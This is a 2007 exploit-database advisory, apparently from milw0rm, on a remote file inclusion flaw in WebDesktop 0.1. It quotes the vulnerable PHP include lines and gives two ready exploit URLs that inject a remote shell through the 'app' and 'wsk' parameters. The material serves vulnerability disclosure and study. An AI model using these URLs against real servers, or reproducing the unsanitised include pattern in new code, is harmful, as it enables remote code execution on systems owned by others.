WebDesktop 0.1 Remote File Inclusion Vulnerability

vendor:

WebDesktop

by:

S.W.A.T.

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: WebDesktop

Affected Version From: WebDesktop 0.1

Affected Version To: WebDesktop 0.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

WebDesktop 0.1 Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include arbitrary files from a remote server.

Mitigation:

Unknown

Source

Exploit-DB raw data:

                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  WebDesktop 0.1
              Download :  http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              Y! ID    :  Svvateam
              E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
              Dork     :   :( 
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

include($wsk . ".wsk/" . $wsk . ".php");

&&&&&&&&

include($app . ".app/" . $frm . ".frm/" . $frm . ".php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]